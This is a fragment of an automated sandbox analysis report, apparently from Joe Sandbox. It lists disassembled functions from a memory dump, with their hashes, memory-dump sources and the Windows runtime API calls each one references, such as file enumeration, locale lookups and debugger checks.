                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: ,$.$bad locale name$false$true
                                                                                                                                                                                                                                        • API String ID: 0-3659324578
                                                                                                                                                                                                                                        • Opcode ID: ccc80f4400559415ba162a0e40f65fb29b6e4d81a3fcbe2d35464d1b223d7450
                                                                                                                                                                                                                                        • Instruction ID: 567e8a576c56147450551ae8ac51724e0e778e9cf26b25d8ce53ee28b7a4a5d1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ccc80f4400559415ba162a0e40f65fb29b6e4d81a3fcbe2d35464d1b223d7450
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3422BB715083808FD320DF69C880B5BBBE4BF99704F54491EF8889B252E779D948CB97
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: /$8P$8P$@P
                                                                                                                                                                                                                                        • API String ID: 0-2506659036
                                                                                                                                                                                                                                        • Opcode ID: 8431f7e6f095686899eb3b2d14f4e89cb10a683d6166a12c9209fd9b27300e9c
                                                                                                                                                                                                                                        • Instruction ID: b842c9fec96c543fd7e63e00b4023d00e0ca8ed58626dbe622731d3b1a74a399
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8431f7e6f095686899eb3b2d14f4e89cb10a683d6166a12c9209fd9b27300e9c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 499283B2E106099BDB14DEA9CC95BEE77B4AB25344F04413FE902E7281EB7CD909CB54
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 004EE0A2
                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 004EE11D
                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 004EE13F
                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 004EE162
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1164774033-0
                                                                                                                                                                                                                                        • Opcode ID: 44b8f05af09cee8f5967418903d228d283fd67004b49e222f17b9879212ea133
                                                                                                                                                                                                                                        • Instruction ID: bb2ea6e48625e0632ae46b2ba47239ea73f1449de7e9520c187dd614facbc8a6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44b8f05af09cee8f5967418903d228d283fd67004b49e222f17b9879212ea133
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1410971900669AFDB30EF6BCC889BFB379EF45306F104196E505D3280E6789E84CB69
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00497276
                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00497342
                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0049735B
                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00497365
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 254469556-0
                                                                                                                                                                                                                                        • Opcode ID: dbae2f770b5f68c949a14857b178855b7bf92d9fc0f266aa7afe5d05afdb737c
                                                                                                                                                                                                                                        • Instruction ID: 442527c3d827187e4d8ce4338e0b101b72e7960858cd13f4edf2a00f40db59ee
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dbae2f770b5f68c949a14857b178855b7bf92d9fc0f266aa7afe5d05afdb737c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 79312975D052189BDF20DFA5DC497CDBBB8AF08305F1041AAE80DAB250EB759B88DF84
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,?,00000002), ref: 004724CB
                                                                                                                                                                                                                                        • FormatMessageA.KERNEL32(00001300,00000000,?,?,?,00000000,00000000), ref: 004724F2
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FormatInfoLocaleMessage
                                                                                                                                                                                                                                        • String ID: !x-sys-default-locale
                                                                                                                                                                                                                                        • API String ID: 4235545615-2729719199
                                                                                                                                                                                                                                        • Opcode ID: cd79bbb978c5bb3489cf6d77012603f9965b9e78f7ea0b01a4e1ebb1db1ff8fc
                                                                                                                                                                                                                                        • Instruction ID: c7b576afc5ec86cce1e19306ec9318cb014bc8f22b7149d60231977d19d49169
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd79bbb978c5bb3489cf6d77012603f9965b9e78f7ea0b01a4e1ebb1db1ff8fc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6FF03075610119FFFB189B99CD0ADEB7AACEB09794F108059BA06D6180E2F0AE00D775
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004F35C4
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004F360E
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004F36D4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                                                                                                                        • Opcode ID: 4d9ec6c836bbce6ef50285691db116ee1620bd769697d7146288ec9fcd21ea5e
                                                                                                                                                                                                                                        • Instruction ID: 1cdc9ec792ebbbb7a46539b5befa97e62df99b28136104c88c3ac9bfddefed82
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d9ec6c836bbce6ef50285691db116ee1620bd769697d7146288ec9fcd21ea5e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF6195B151010B9FEF24AF29CD82B7A77E8EF04306F10806BEE05C6285E778DA95DB55
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 004A84FD
                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004A8507
                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 004A8514
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                                                                                                        • Opcode ID: e1a3b15dccffe379c5dd170aefe6985605e9deae1ca44c3bf1101bb292f25153
                                                                                                                                                                                                                                        • Instruction ID: ba34d74176ab7d08a86d4c8f577662424a9e501ad34007481ef84d5651fe851a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e1a3b15dccffe379c5dd170aefe6985605e9deae1ca44c3bf1101bb292f25153
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A631C274D01218ABCB21DF68D8887DDBBB4BF18351F5041EAE81CA7291EB749F858F44
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 65dd3414c6befd120c331aa0abc49a847ad014b3fe90ec27b51539937aee0292
                                                                                                                                                                                                                                        • Instruction ID: 4a1797fa3a3c23e63855082e03050c99c292b2e497e5c97cc4ad5b007b803259
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65dd3414c6befd120c331aa0abc49a847ad014b3fe90ec27b51539937aee0292
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3351D4B5C04219AFDB24DF6ACC89EABB7B9EF45305F14429EE809D3201EA359E44CB54
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?), ref: 004E2688
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionRaise
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3997070919-0
                                                                                                                                                                                                                                        • Opcode ID: 9644709f0407872747167c536b67c5a382f90bf6a99aecf6620f8d79d3d94960
                                                                                                                                                                                                                                        • Instruction ID: 11b22a042e54ec0560605dadca7490718b009da678b2aec19f9626016d7aad6e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9644709f0407872747167c536b67c5a382f90bf6a99aecf6620f8d79d3d94960
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4AB19C31210648DFDB14CF29C68AB657BE0FF05366F258659E899CF3A1C379E982CB44
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00496DFD
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2325560087-0
                                                                                                                                                                                                                                        • Opcode ID: 541ba60e4a205aad5c3e4b3d3582a3f1d939016cbfb2cc98759125e362f067a0
                                                                                                                                                                                                                                        • Instruction ID: 918401ef7aafa049fa4500a7dff32d5603a1dd6c1edbc6953dfebf4dddf52057
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 541ba60e4a205aad5c3e4b3d3582a3f1d939016cbfb2cc98759125e362f067a0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03518CB29002058FDF25CF69D9817AABBF4FB58301F25842AD404EB394D7B8D944DBA0
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                        • API String ID: 0-4108050209
                                                                                                                                                                                                                                        • Opcode ID: e4d3b3a0527c84b859d2adfd20232531fc44543ababc2a19baf5d0c98ba72520
                                                                                                                                                                                                                                        • Instruction ID: 0ae791d9d68d9767a81040fcd8006ddffe510354c255e96fe3a491759709cf23
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e4d3b3a0527c84b859d2adfd20232531fc44543ababc2a19baf5d0c98ba72520
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1CE1AC386006058FCBA4CF68C680FAEB3B1BF59314B24465FD456AB391D7F8AD46CB19
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
